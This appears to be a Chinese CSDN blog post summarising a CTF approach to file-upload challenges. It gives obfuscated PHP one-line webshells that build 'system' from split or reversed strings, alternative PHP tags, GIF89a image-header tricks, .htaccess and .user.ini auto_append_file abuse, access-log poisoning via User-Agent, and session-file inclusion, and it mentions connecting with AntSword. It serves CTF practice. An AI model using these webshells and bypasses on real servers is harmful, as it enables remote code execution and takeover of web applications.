文件上传做题流程

于 2024-02-22 18:44:00 发布
阅读量682 收藏 11
点赞数 10
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mssqj/article/details/136240858
版权
本文讲述了前端和后端防止文件上传漏洞的过滤措施,包括大小写绕过、PHP字符串连接、图片头检测,以及如何利用.htaccess、.user.ini和session文件进行绕过。强调了逐步测试和找到最简便方法的重要性。
摘要由CSDN通过智能技术生成

1.前端过滤

第一步就是前端绕过了,可以把后边的删了,前边的改成files

就像这样

这样在前端就可以随便上传文件了

2.后端过滤

常见的是后端,也就是服务器端的过滤

注意后端对文件名的检测,抓到包之后放到repater里边进行测试,测试过滤。。

首先,排除内容过滤,先测文件名,文件后缀,看php文件是不是能上传。。

1.如果能传php

那就测试内容过滤,先写一个一句话木马,上传失败,就二分法检测过滤,具体检测到它过滤了那个单词。。

绕过

1.0  大小写绕过,SyStEm,

1.1  利用php字符串的连接性,例如sys.tem

1.2  

<?php

$a="s,y,s,t,e,m";

$b=explode(",",$a); 以','为分割符,将字符串拆分为数组

$c=$b[0].$b[1].$b[2].$b[3].$b[4].$b[5];

$c($_REQUEST['pass']);

?>

1.3

<?php

$a=substr("1sys",1)."tem";返回字符串中第一位以后的字符串

$a($_REQUEST['pass']);

?>

1.4

$a=strrev("metsys"); 反转字符串

$a($_REQUEST['pass'])

?>

1.5

<?php

$a=$_REQUEST['a'];

$b=$_REQUEST['b'];

$a($b);

?>

2.如果不能上传php

那麽就是图片了

一点要注意图片头的检测,加上GIF89a

................................................................................................................

首先考虑上传图片马,如果是apache服务器的,看到httpd,和apache有关,那就可以利用.htaccess来解析jpg.png.从而达到目的

..................................................................................................................

如果不是apache的那么就用.user.ini.  条件是上传路经中要

有php文件,然后上传特定文件名的图片,他就会被包含在那个PHP文件中

...................................................................................................................

然后看内容过滤,

过滤标签php

<? echo '123';?>

<?=(表达式)?>  等价于 <?php echo (表达式)?>

<% echo '123';%>

<script language=”php”>echo '123'; </script>

过滤[]

一句话木马中$_POST[]不能用,用{}替代

过滤()

eval 就不能用了,改echo `ls /` 直接命令

过滤了 `  `

用日志包含,

日志包含成功后,访问,UA传一句话木马

再post传参,这里用phpinfo()定位

a=system(ls /);phpinfo();感觉不好用,不如蚁剑直接连

过滤了  < >

这种最难,

日志包含

如果它不过滤php的话,可以先传一个index.php文件

然后.user.ini传一个auto_append_file=/var/log/nginx/access.log

然后进入/upload/index.php ,改UA ,连蚁剑

过滤php的话就user.ini.传

auto_append_file=1.png

再传1.png

GIF89a

<?= include "/var/lo"."g/nginx/access.lo"."g"?>

.............这样好像也不行。。有< >

标准方法是session包含

进行条件竞争

如果在上传.user.ini文件时过滤了.,

那么只能采用包含session文件的方法

.user.ini文件内容为

GIF89a

auto_prepend_file=/tmp/sess_shell

这样可以跳过上传图片马作为包含文件的跳板,直接使upload下的index.php文件包含session文件

需要编写一个向目标地址发送POST请求创建session文件的文件上传网页

注意点:

1.一句话木马传上了,但hacbar用不了,那就换bp抓包试一试

记得根据情况改传参方式,repater测试就完了,。

......................................................................................................................................

如果我上边所说的方法或名词你不知道,那么你可以先去学习一下,再来看。。

本文章只是总结一下思路和流程,反正就是一点点测试,找出对应最简便的做法。。

陌上笙清净
关注
文件上传过滤和绕过
weixin_45253622的博客
03-13 4272
文件上传过滤和绕过 1、前端JS检查 发现http请求没通过burp就弹出了不允许上传的提示框,说明验证点在前端,而不在服务端。 网页源码 function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; }
高薪程序员&面试题精讲系列23之说一下如何实现文件上传、下载以及断点续传?
一一哥
11-23 1202
一. 面试题及剖析 1. 今日面试题 在上一篇文章中,壹哥 给大家总结了I/O流相关的内容,复习了各种I/O流相关API。其实我们去面试的时候,面试官提问的前后两个题目之间往往会具有一定的关联性。比如今天 壹哥 要给各位讲解的面试题,就与上一篇的内容具有一定的关系,题目如下: 说一下如何实现文件上传和下载? 断点续传有没有了解过? 2. 题目剖析 虽然今天的题目问的是如何实现文件的上传和下载,但实现文件上传下载的核心操作,离不开I/O流的支持,另外我们再结合Web与框架相关知识,就可以很容易
文件上传基础及过滤方式
硫酸超的博客
08-09 1179
文件上传基础及过滤方式什么是文件上传漏洞?文件上传漏洞有哪些危害?文件上传漏洞如何查找及判断?文件上传漏洞有哪些需要注意的地方?关于文件上传漏洞在实际应用中的说明?演示案例常规文件上传地址的获取说明不同格式下的文件类型后门测试配合解析漏洞下的文件类型后门测试本地文件上传漏洞靶场环境搭建测试某 CMS 及 CVE 编号文件上传漏洞测试 什么是文件上传漏洞? 凡是存在文件上传的地方它均有可能存在文件上传漏洞,关于上传文件操作的时候对方代码写的是否完整、是否安全,一旦疏忽了某个地方可能会造成文件上传漏洞。 文件
文件上传2----前端JS验证与后端文件类型验证绕过
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
05-25 1591
一、前端过滤绕过(Less-1) 前期准备: 菜刀、php一句话木马一个。 情况描述: 按照题目要求,需要上传一个图片。但是我们准备的是一个php的木马文件。先上传试一下。结果发现,对文件后缀名进行了校验,要求输入特定后缀的文件。 对于文件后缀名的校验,无非前端和后端两种,先看一看前端源码,解雇,发现确实是前端JS验证导致的问题。 既然是前端校验,那方法就多了呀,首先可以考虑修改源码的匹配规则,或者是通过伪造后缀名绕过前端验证之后修改后缀名进行上传。 方法一:修改源码 刷新题目页面,通过burp代理截断
iwebsec文件上传漏洞-前端JS过滤绕过
最新发布
qq_56041380的博客
03-27 904
前端JS过滤绕过的原理是:应用程序是在前端通过JS代码进行验证,而不是在程序后端进行验证,这样攻击者就可以通过修改前端JS代码绕过上传过滤,上传木马。
iwebsec靶场 文件上传漏洞通关笔记1-第01关 前端js过滤绕过
mooyuan的博客
12-04 2030
第01关 前端js过滤绕过1.禁用js法(1)禁用js(2)刷新页面使生效(3)上传脚本(4)开启js并刷新页面2.修改页面法1(1)右键查询元素(2)搜索关键字check(3)删除函数调用(4)上传脚本 (5)访问脚本3.bp改包法(1)分析源码(2)将脚本后缀改为jpg(3)上传info.jpg并bp抓包(4)bp中将info.jpg改名为info.php并发送(5)访问脚本打开第一关靶场iwebsec 靶场漏洞库iwebsechttp://iwebsec.com:81/upload/01.php构
1C语言二级编程题特殊做题方法-基本步骤篇.doc
09-27
以下是一些针对这类题目特殊做题方法的基本步骤,旨在帮助考生更有效地应对考试。 首先,**认真分析题目**是至关重要的。考生需要确保完全理解题目的要求,明确输入、输出格式以及程序应该执行的功能。例如,如果...
springmvc工作流程面试题有哪些?springmvc工作流程面试题分享
muli525的博客
03-17 1582
Spring MVC 是 Spring 提供的一个基于 MVC 设计模式的轻量级 Web 开发框架,它能够很好的解决开发人员的开发负担,使开发简便化,因此在企业中得到广泛的使用,并且在面试中也常常会问到这方面的问题,那springmvc工作流程面试题有哪些?下面来我们就来给大家讲解一下。 1.SpringMVC的流程? (1)用户发送请求被前端DispatcherServlet捕获; (2)DispatcherServlet捕获到请求后,调用HandlerMapping处理映射器,请求获取Handle; (
文件上传
qingse1013的博客
01-24 2875
文件上传 原理 类型 预防 0x00 文件上传原理 文件上传漏洞是指用户上传了一个可执行脚本文件,并通过此文件获得了执行服务器端命令的能力。在大多数情况下,文件上传漏洞一般是指上传 WEB 脚本能够被服务器解析的问题,也就是所谓的 webshell 问题。完成这一攻击需要这样几个条件,一是上传的文件能够被 WEB 容器执行,其次用户能从 WEB 上访问这个文件,最后,如果上传的文件被安全检查、格式化、图片压缩等功能改变了内容,则可能导致攻击失败。 Webshell简介: WebShell就是以a
面试流程和面试题
weixin_45037570的博客
09-29 456
面试顺序 面试顺序 自我介绍–>项目讲解–>项目中遇到的问题和相关知识点提问–>你还有什么想问的 介绍 我叫xx,来自xx,毕业于xxx。毕业以后加入了xxxx,研发了xxx项目。这个项目是今年(去年)的xx月开始开发和搭建的,项目开发的总共xxx人,开发的周期是xxx月。SpingCloud、springboot、Mybatis框架集成开发。 1.项目您负责的是哪些模块? 分类统计 、报表、交易管理、还款管理 2.项目哪一个收获更多? 例如:钱多多金融平台收获更多,用到短信验证码存储到r
文件上传思路总结
Flynn的博客
03-18 1117
思路总结 当遇到js前端脚本限制上传文件类型 使用浏览器插件。删除检测文件后缀的JS代码,然后上传webshell 在前端js判断函数中加上可以上传php文件,或者直接删去这一函数 首先把webshell的后缀改成允许上传的.jpg|.png|.gif,绕过JS检测。再抓包把后缀名改成.php,即可上传webshell 当服务器检测上传文件的MIME类型即媒体类型时 当上传PHP文件时,抓包发现Content-Type字段是application/x-php 这时只要修改为其他值即可 后端
文件上传( upload-labs解题
weixin_54475242的博客
04-12 318
文件上传解题 (绕过JS校验上传-前端) 例:upload-labs-master/Pass-01 上传一个php文件,可以看到有弹窗弹出,不被允许上传 2.将php文件后缀名改为jpg ,进行抓包 3.将“1.jpg”改为“1.php” forward一下 4.查看文档,存在PHP文件。即上传成功 文件头检测-服务器端 例:upload-labs-master/Pass-14 先用PHP文档测试一下,不行。随便输入一些数值进行抓包 将输入数值直接改为 GIF 89A(或者也可把所对应对
CTF中文件上传题目整理总结
热门推荐
xiaotaode2012的专栏
08-16 1万+
0X00说在前面的话 CTF中或多或少都有点文件上传的题目,而这个又是最好整理的,变化的方式不是很多(至少到目前为止我没有发现太多的姿势。。。。),随意就先整理这个吧。 0x01文件上传绕过的主要姿势有: A:基于前台JS的验证,这个 不要说就是firebug下修改一下JS文件就绕过了 B:基于文件后缀名的绕过,这里面的主要姿势有:利用后缀名大小写混用绕过、空格或者
文件上传绕过
qq_25987491的博客
04-16 1649
解题链接: http://ctf5.shiyanbar.com/web/upload 首先随手上传了一个图片,得到返回:再尝试php文件,得到返回很明显,题意为卡住php后缀,逼迫你上传文件后缀为jpg等类型,典型的上传绕过问题上传绕过解题思路可参考我转载的【文件上传检测的基本思路】,一般按照思路逐步尝试即可,简单的大小写,加后缀不可过,此题无js,猜测为0x00截断上传,此处仔细分析何为0x00...
CTF练习题——Upload上传的一道解题思路
Jum的博客
08-11 3565
好久没有去联系联系了,今天做了一道关于Upload的题,分享一下 目录 拿题目 找思路 得到结果 成功 拿题目 这道题目是百度CTF题目,题干如下: 找思路 题干中提示 tips:flag在flag.php中。看到题干后,可以上传任意文件,并且上传之后可以打开文件,想到上传一段php代码来打开flag.php页面: <?php $fh=fopen('../flag.php','r'); echo fread($fh,filesize("../flag.php")); ...
WEB安全---文件上传2(upload-labs解题前十关)
qq_41759633的博客
08-09 638
upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 第一关: ...
ctf文件上传基本思路+例题
limenzzz的博客
04-12 4123
目录 简介 一句话木马 蚁剑 例题 总结思路 附言 简介 文件上传本质上就是将文件传输到服务器时没有做好检测和过滤,导致可上传恶意程序到服务器,从而获得后台权限来干点坏事。一般这个恶意脚本文件称为webshell,通过webshell我们可以查看服务器的目录结构或文件,以及来执行一些系统指令。小马和大马,简单来说,大马是多功能,危害大,体积大的木马,小马是隐蔽性强,体量小,更方便的小木马。一句话木马就属于小马,所以较易突破防护,而大马极易被过滤。 一句话木马 首先通过看一些题解和博.
CTF从入门到提升(九)文件上传以及相关例题分享
anquanniu的博客
09-04 3754
文件上传主要是配合一些漏洞的利用,普遍意义上的文件上传是指将信息从个人计算机传送至中央计算机,也就是我们所说的远程计算机,对站点来说,就是传到运行网站的服务器上。一般网站都有自己的逻辑,比如在网站的注册页面,你想要上传个头像,网站只需要你上传头像,而不是传其他类型的文件。 CTF上传文件的目的是get shell,我们最终目的是拿到题目的flag,如果说存在一个上传的地方,很有可能它的目的就...
文件上传的思路和步骤以及多文件上传、文件下载
qq_57039307的博客
06-15 435
文件上传的思路和步骤以及多文件上传、文件下载
Java+MySQL打造学生在线练习与学习资源推荐平台
资源摘要信息:"一个基于Java语言和MySQL数据库技术构建的学生在线做题及推荐资源的学习网站,适合不同技术领域学习者使用,也可作为教学、实训的参考项目。该网站的开发使用了Java开发环境JDK 1.7.0_71,集成开发...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值